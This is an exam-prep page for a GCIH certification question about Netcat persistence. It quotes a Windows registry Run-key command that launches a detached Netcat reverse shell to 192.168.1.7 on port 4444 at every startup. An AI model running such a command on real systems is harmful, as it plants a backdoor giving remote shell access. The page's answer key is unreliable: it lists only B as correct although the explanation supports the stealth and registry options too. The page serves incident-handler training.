nerdexam
ExamsGCIHQuestions#40
GIAC

GCIH · Question #40

GCIH Question #40: Real Exam Question with Answer & Explanation

The correct answer is B: You want to set the Netcat to execute command any time.. The reg add command writes Netcat to the Windows Registry Run key so it launches automatically on startup in detach (stealth) mode and connects back as a reverse shell. The question tests understanding of Netcat persistence and stealth flags.

Vulnerability Exploitation & Privilege Escalation

Question

You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe" What task do you want to perform by running this command? Each correct answer represents a complete solution. Choose all that apply.

Options

  • AYou want to perform banner grabbing.
  • BYou want to set the Netcat to execute command any time.
  • CYou want to put Netcat in the stealth mode.
  • DYou want to add the Netcat command to the Windows registry.

Explanation

The reg add command writes Netcat to the Windows Registry Run key so it launches automatically on startup in detach (stealth) mode and connects back as a reverse shell. The question tests understanding of Netcat persistence and stealth flags.

Common mistakes.

  • A. Banner grabbing involves connecting to a remote service to retrieve its version or type information using tools like Telnet or Netcat in a read-only probe - this command configures a persistent reverse shell, not a banner grab.

Concept tested. Netcat persistence via Windows registry Run key

Reference. https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys

Topics

#Windows registry persistence#Netcat backdoor#registry run key#post-exploitation

Community Discussion

No community discussion yet for this question.

Sign up to join the discussion
Full GCIH Practice